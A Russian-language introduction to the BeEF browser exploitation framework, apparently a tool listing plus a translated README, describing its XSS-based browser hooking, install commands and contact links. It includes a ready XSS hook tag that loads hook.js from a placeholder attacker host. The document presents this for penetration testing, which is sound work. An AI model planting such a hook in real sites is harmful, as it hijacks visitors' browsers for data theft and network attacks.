Browser Exploitation Framework — фреймворк для атак через XSS-хук на браузер. После внедрения JS-агента: сбор информации, атаки на внутреннюю сеть, социальная инженерия в браузере, эксплуатация расширений. 300+ модулей атак.
# Kali Linux (предустановлен): sudo beef-xss # Из исходников: git clone https://github.com/beefproject/beef cd beef bundle install sudo ./beef # Интерфейс: http://127.0.0.1:3000/ui/panel # Хук: <script src="http://yourip:3000/hook.js"></script>
===============================================================================
Авторское право (c) 2006-2026 Уэйд Элкорн - wade@bindshell.net
Фреймворк эксплуатации браузеров (BeEF) - https://beefproject.com
Смотрите файл 'doc/COPYING' для получения разрешения на копирование
===============================================================================
BeEF — это сокращение от The Browser Exploitation Framework (Фреймворк эксплуатации браузеров). Это инструмент для тестирования на проникновение, который сфокусирован на веб-браузерах.
На фоне растущих опасений по поводу веб-атак на клиенты, включая мобильные клиенты, BeEF позволяет профессиональному тестеру на проникновение оценить реальную позицию безопасности целевой среды, используя векторы атак на стороне клиента. В отличие от других фреймворков безопасности, BeEF смотрит за укрепленную сетевую периферию и клиентскую систему и исследует возможности эксплуатации в контексте единственной открытой двери: веб-браузера. BeEF «подцепит» один или несколько веб-браузеров и использует их как плацдарм для запуска целевых модулей команд и последующих атак на систему из контекста браузера.
Вы можете связаться с командой BeEF. Просто ознакомьтесь со следующим:
Пожалуйста, присылайте нам pull request'ы!
Сайт: https://beefproject.com/
Ошибки: https://github.com/beefproject/beef/issues
Ошибки безопасности: security@beefproject.com
Twitter: @beefproject
Discord: https://discord.gg/25wT2P8pwx
brew install selenium-server-standalone (Смотрите https://github.com/shvets/selenium)Следующее для нетерпеливых.
Скрипт install устанавливает необходимые пакеты операционной системы и все предварительные гемы Ruby:
$ ./install
Для получения полных сведений об установке, пожалуйста, обратитесь к INSTALL.txt или к странице Установка на вики.
После успешной установки обязательно прочитайте страницу Конфигурация на вики, чтобы узнать важные подробности о настройке и обеспечении безопасности BeEF.
Чтобы начать, просто выполните команду beef и следуйте инструкциям:
$ ./beef